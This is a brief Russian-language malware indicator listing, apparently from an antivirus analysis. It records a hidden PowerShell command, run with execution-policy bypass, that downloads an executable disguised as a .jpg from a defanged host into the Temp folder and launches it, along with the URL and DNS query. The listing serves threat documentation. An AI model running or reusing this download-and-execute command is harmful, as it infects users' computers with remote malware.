Техническая информация
- http://cr##trt.com/i7/32027444.jpg как %temp+%\dfge.exe
- '<SYSTEM32>\cmd.exe' /c powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://cr##trt.com/i7/32027444.jpg',$env:Temp+'\dfge.exe');(New-Object -com Shell.Ap...
- http://cr##trt.com/i7/32027444.jpg
- DNS ASK cr##trt.com
- '<SYSTEM32>\cmd.exe' /c powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://cr##trt.com/i7/32027444.jpg',$env:Temp+'\dfge.exe');(New-Object -com Shell.Ap...' (со скрытым окном)